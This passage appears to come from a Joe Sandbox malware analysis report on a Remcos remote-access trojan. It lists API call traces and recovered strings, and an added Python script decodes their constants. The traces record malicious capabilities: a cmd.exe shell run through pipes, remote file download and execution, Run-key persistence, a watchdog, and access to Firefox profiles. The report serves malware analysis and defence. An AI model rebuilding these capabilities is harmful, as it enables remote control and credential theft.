                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateEventStartupsocket
                                        • String ID:
                                        • API String ID: 1953588214-0
                                        • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                        • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                        • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                        • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
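The argument columns in these listings are raw hex, so reading them means carrying the constants in your head: in the CreateFileW/SetFilePointer/WriteFile/CloseHandle routine at 0041B5DE, 40000000 is GENERIC_WRITE, the fifth argument 00000002 is CREATE_ALWAYS, 00000080 is FILE_ATTRIBUTE_NORMAL and SetFilePointer's 00000002 is FILE_END, so the routine appends to a file; in the RegOpenKeyEx calls, 80000001 and 80000002 are HKEY_CURRENT_USER and HKEY_LOCAL_MACHINE, 00020019 is KEY_READ and the 00000002 at 00412988 is KEY_SET_VALUE, the right RegDeleteValueW needs; in the socket.WS2_32 call above, 00000001/00000006 is SOCK_STREAM/IPPROTO_TCP and WSAStartup's 00000202 requests Winsock 2.2. The decoder below is an added example written for this page, not part of the Joe Sandbox report or its IDA plugin: it parses API lines in the exact format printed here (the sample input is copied from the listings on this page and serves the file, registry, mutex and socket routines alike), resolves the documented Win32/Winsock constants to their names and leaves arguments the plugin could not resolve (`?`) as None. APIs it does not know are still parsed, with an empty note.

```python
import re
from typing import Dict, List, Optional, Union

# Documented Win32 / Winsock constants (standard values, not taken from the report).
HKEY_ROOT = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
             0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
REG_SAM = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x20019: "KEY_READ",
           0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
GENERIC = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
           (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTR = {0x02: "FILE_ATTRIBUTE_HIDDEN", 0x80: "FILE_ATTRIBUTE_NORMAL",
             0x04000000: "FILE_FLAG_DELETE_ON_CLOSE"}
MOVE_METHOD = {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"}
SOCK_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
IPPROTO = {0: "IPPROTO_IP", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}

# Matches "Api.MODULE(args), ref: 0041B5DE" and the argument-less form "Api.MODULE ref: 0040BEF1".
CALL_RE = re.compile(r"(?P<api>[A-Za-z_][\w@]*)\.(?P<mod>[A-Z0-9_]+)"
                     r"(?:\((?P<args>[^)]*)\))?(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8}))?")

Arg = Union[None, int, str]


def parse_args(raw: Optional[str]) -> List[Arg]:
    """'?' -> None (unresolved by the plugin), eight hex digits -> int, anything else -> literal."""
    if not raw:
        return []
    out: List[Arg] = []
    for tok in (t.strip() for t in raw.split(",")):
        if tok == "?":
            out.append(None)
        elif re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
            out.append(int(tok, 16))
        else:
            out.append(tok)
    return out


def flags(value: int, table) -> str:
    """Render a bit mask as OR-ed names, falling back to hex when no known bit is set."""
    names = [name for bit, name in table if value & bit]
    return "|".join(names) if names else hex(value)


def arg(args: List[Arg], i: int) -> Arg:
    return args[i] if i < len(args) else None


def describe(api: str, args: List[Arg]) -> str:
    """Name the arguments that matter for triage; APIs not handled here get an empty note."""
    if api in ("CreateFileW", "CreateFileA"):
        acc, disp, attr = arg(args, 1), arg(args, 4), arg(args, 5)
        return "access=%s disposition=%s attrs=%s" % (
            flags(acc, GENERIC) if isinstance(acc, int) else "?",
            DISPOSITION.get(disp, disp), FILE_ATTR.get(attr, attr))
    if api == "SetFilePointer":
        return "move=%s" % MOVE_METHOD.get(arg(args, 3), arg(args, 3))
    if api in ("RegOpenKeyExW", "RegOpenKeyExA"):
        root, sub, sam = arg(args, 0), arg(args, 1), arg(args, 3)
        return "root=%s subkey=%s access=%s" % (
            HKEY_ROOT.get(root, root), sub if isinstance(sub, str) else "?", REG_SAM.get(sam, sam))
    if api == "socket":
        return "type=%s proto=%s" % (SOCK_TYPE.get(arg(args, 1), arg(args, 1)),
                                     IPPROTO.get(arg(args, 2), arg(args, 2)))
    if api == "WSAStartup":
        v = arg(args, 0)   # MAKEWORD(major, minor): low byte major, high byte minor
        return "version=%d.%d" % (v & 0xFF, v >> 8) if isinstance(v, int) else "version=?"
    if api in ("CreateMutexA", "CreateMutexW"):
        return "initial_owner=%s" % bool(arg(args, 1))
    return ""


def decode_line(line: str) -> Optional[Dict]:
    """Return None for lines that are not API calls (dump sources, hashes, headings)."""
    m = CALL_RE.search(line)
    if not m:
        return None
    args = parse_args(m.group("args"))
    return {"api": m.group("api"), "module": m.group("mod"), "ref": m.group("ref"),
            "args": args, "note": describe(m.group("api"), args)}


def decode_report(lines) -> List[Dict]:
    return [d for d in (decode_line(line) for line in lines) if d]


# Constructed sample input: API lines copied from this report's listings, plus one non-API line.
SAMPLE = [
    "• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6B5,00000000,00000000,?), ref: 0041B5DE",
    "• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5FB",
    r"• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988",
    "• RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537",
    "• CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6",
    "• GetLastError.KERNEL32 ref: 0040BEF1",
    "• socket.WS2_32(?,00000001,00000006), ref: 00404212",
    "• WSAStartup.WS2_32(00000202,00000000), ref: 00404277",
    "• Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true",
]

if __name__ == "__main__":
    for d in decode_report(SAMPLE):
        print("%s %s!%s %s" % (d["ref"], d["module"], d["api"], d["note"]))
```

Feed it the whole report text (one line per list element) rather than hand-picked lines; the regex ignores everything that is not an API call. The plugin prints a literal argument (such as the Policies\Explorer\Run path or pth_unenc) only when it resolved one statically, so a None in the args list is a genuine unknown, not an empty string, and the note says "?" for it rather than guessing.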
                                        APIs
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DF7
                                          • Part of subcall function 00437BE7: RaiseException.KERNEL32(?,?,00434421,?,?,?,?,?,?,?,?,00434421,?,0046D644,0041AD85,?), ref: 00437C47
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E14
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception@8Throw$ExceptionRaise
                                        • String ID:
                                        • API String ID: 3476068407-0
                                        • Opcode ID: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
                                        • Instruction ID: a120e58b429b9861eb3006866c51ef53ea309f8249189fce9472b36b7df41f91
                                        • Opcode Fuzzy Hash: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
                                        • Instruction Fuzzy Hash: EFF0243080430D7BCB14BEAAE80799D772C5D08319F60612BB825955E1EF7CE715C58E
                                        APIs
                                        • GetForegroundWindow.USER32 ref: 0041AC84
                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC97
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Window$ForegroundText
                                        • String ID:
                                        • API String ID: 29597999-0
                                        • Opcode ID: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                        • Instruction ID: cc2156d331005380bc7f387210694eb4be3f76427b44d354f8bc4e4bef854abe
                                        • Opcode Fuzzy Hash: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                        • Instruction Fuzzy Hash: CFE04875A0031867FB24A765AD4EFD6766C9704715F0000B9BA19E21C3E9B4EA04C7E4
                                        APIs
                                        • getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
                                        • WSASetLastError.WS2_32(00000000), ref: 00413FC1
                                          • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                          • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                          • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                          • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                          • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
                                          • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                          • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                          • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                        • String ID:
                                        • API String ID: 1170566393-0
                                        • Opcode ID: fe532004205893b42ca3e78fe98bfc0c037fcd8dad322742003ca3565627297f
                                        • Instruction ID: 6b8e1b3bf706901e9cebb32ced8ad4f2671330a9e567d97b4cc2d1cd49d6d23a
                                        • Opcode Fuzzy Hash: fe532004205893b42ca3e78fe98bfc0c037fcd8dad322742003ca3565627297f
                                        • Instruction Fuzzy Hash: CED05B326406216FA310575D6D01FFBB5DCDFA67717110077F408D7110D6946D8283ED
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                        • Instruction ID: 9aef8a7b80d5ef8cde78cc1a95e43686bba12cbd10c6cd592e8946dff14ce016
                                        • Opcode Fuzzy Hash: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                        • Instruction Fuzzy Hash: 54E0E5312012B5A7FB202A6A9C05F5B7688DB437A4F060033AC45D66D0CB58EC4181AF
                                        APIs
                                        • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Startup
                                        • String ID:
                                        • API String ID: 724789610-0
                                        • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                        • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                        • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                        • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: send
                                        • String ID:
                                        • API String ID: 2809346765-0
                                        • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                        • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                        • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                        • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                        APIs
                                        • SetEvent.KERNEL32(?,?), ref: 00406F28
                                        • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                        • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                          • Part of subcall function 0041B43F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                                          • Part of subcall function 0041B43F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                                          • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                                          • Part of subcall function 0041B43F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                                          • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                          • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                          • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                          • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                          • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                          • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(00000328,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                          • Part of subcall function 00404468: SetEvent.KERNEL32(00000328,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                        • DeleteFileA.KERNEL32(?), ref: 004078CC
                                          • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                          • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                          • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                        • Sleep.KERNEL32(000007D0), ref: 00407976
                                        • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                          • Part of subcall function 0041BB87: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                        • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$TTF$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                        • API String ID: 2918587301-184849705
                                        • Opcode ID: d91289d3051c322bdd857101a0a8adc0020f2fb1390e52d7e39c11ee2c34041e
                                        • Instruction ID: 1bc88c7e1bb4371a25effcd92402389f4e4e7f2dfcf0a55fa2f5aa785e242239
                                        • Opcode Fuzzy Hash: d91289d3051c322bdd857101a0a8adc0020f2fb1390e52d7e39c11ee2c34041e
                                        • Instruction Fuzzy Hash: CC42A372A043005BC604F776C8979AF76A59F90718F40493FF946771E2EE3CAA09C69B
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 0040508E
                                          • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                          • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        • __Init_thread_footer.LIBCMT ref: 004050CB
                                        • CreatePipe.KERNEL32(00475D0C,00475CF4,00475C18,00000000,0046556C,00000000), ref: 0040515E
                                        • CreatePipe.KERNEL32(00475CF8,00475D14,00475C18,00000000), ref: 00405174
                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C28,00475CFC), ref: 004051E7
                                          • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                          • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                          • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                        • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                        • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                        • CloseHandle.KERNEL32 ref: 004053CD
                                        • CloseHandle.KERNEL32 ref: 004053D5
                                        • CloseHandle.KERNEL32 ref: 004053E7
                                        • CloseHandle.KERNEL32 ref: 004053EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                        • String ID: (\G$SystemDrive$cmd.exe$p\G$p\G$p\G$p\G$p\G
                                        • API String ID: 3815868655-1274243119
                                        • Opcode ID: bf49341456b4085afcbe2274af5a1afd8befb6bfa4028430823d957bc0f49eac
                                        • Instruction ID: e174317c0cfdf92f2f57875e471bcaa01af682fbbee25a17085fe39bc952a1f7
                                        • Opcode Fuzzy Hash: bf49341456b4085afcbe2274af5a1afd8befb6bfa4028430823d957bc0f49eac
                                        • Instruction Fuzzy Hash: 97910971504705AFD701BB25EC45A2F37A8EB84344F50443FF94ABA2E2DABC9D448B6E
                                        APIs
                                        • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                          • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                          • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                          • Part of subcall function 004127D5: RegCloseKey.KERNEL32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                        • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                          • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                          • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                          • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                        • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                        • String ID: 0DG$Remcos restarted by watchdog!$TTF$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                        • API String ID: 65172268-329858390
                                        • Opcode ID: 8a2a67840985eedd0dbda374961972b5c6f523c752149b0273765c4031c1f616
                                        • Instruction ID: cd90af3caa6d69ca3e9ea8718b5663318d6259183dea3b669bddfb6979e5fbe1
                                        • Opcode Fuzzy Hash: 8a2a67840985eedd0dbda374961972b5c6f523c752149b0273765c4031c1f616
                                        • Instruction Fuzzy Hash: 9F718E316042415BC614FB32D8579AE77A4AED4718F40053FF582A21F2EF7CAA49C69F
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                        • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                        • FindClose.KERNEL32(00000000), ref: 0040B517
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
